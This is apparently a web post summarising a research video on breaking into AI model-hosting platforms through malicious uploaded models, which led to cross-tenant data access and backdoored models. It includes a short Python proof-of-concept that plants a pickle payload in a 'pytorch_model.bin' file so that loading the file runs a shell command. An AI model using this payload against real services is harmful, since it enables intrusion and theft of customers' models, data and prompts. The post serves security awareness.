Month of AI Video – Hacking AI Infrastructure Providers for Fun


An increasing number of companies are adopting AI-as-a-Service solutions to collaborate on, train, and run their artificial intelligence applications. From emerging AI startups like Hugging Face and Replicate to established cloud providers such as Microsoft Azure and SAP, thousands of customers entrust these services with their proprietary models and datasets. This reliance makes these platforms appealing targets for attackers.

Over the past year, researchers have been investigating leading AI service providers with a critical question in mind: How vulnerable are these services to attacks that could compromise their security and expose sensitive customer data?

In this video, the researchers present a novel attack technique that they successfully demonstrated against several prominent AI service providers, including Hugging Face and Replicate. On each platform, they used malicious models to break out of security boundaries and move laterally within the service's underlying infrastructure. This approach gave them cross-tenant access to customers' private data, including private models, weights, datasets, and even user prompts. By additionally obtaining global write privileges on these services, they were able to backdoor popular models and launch supply-chain attacks affecting both AI researchers and end-users.
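
The video itself walks through the details, but to make the "malicious model" idea concrete: a common vector in attacks of this kind is Python pickle deserialization, since legacy PyTorch-format model files are pickle archives and loading an untrusted one can execute attacker-controlled code inside the inference environment. The sketch below is illustrative only and is not taken from the researchers' payload; the file name and command are hypothetical placeholders.

```python
import pickle


class MaliciousPayload:
    """Object whose unpickling triggers code execution.

    pickle.load() invokes __reduce__'s returned callable during
    deserialization, so whatever is specified here runs on the
    machine that loads the "model" file.
    """

    def __reduce__(self):
        import os
        # Placeholder command; a real attacker might open a reverse shell
        # or read service credentials available in the inference container.
        return (os.system, ("id > /tmp/pwned",))


# Serialize the payload as if it were an ordinary model artifact.
with open("pytorch_model.bin", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# Any service that naively unpickles the uploaded file executes the payload:
# with open("pytorch_model.bin", "rb") as f:
#     pickle.load(f)  # runs the embedded command in the loading process
```

Once code runs inside the platform's inference infrastructure, the attacker can probe for credentials, network access, and shared resources, which is the starting point for the lateral movement and cross-tenant access described above.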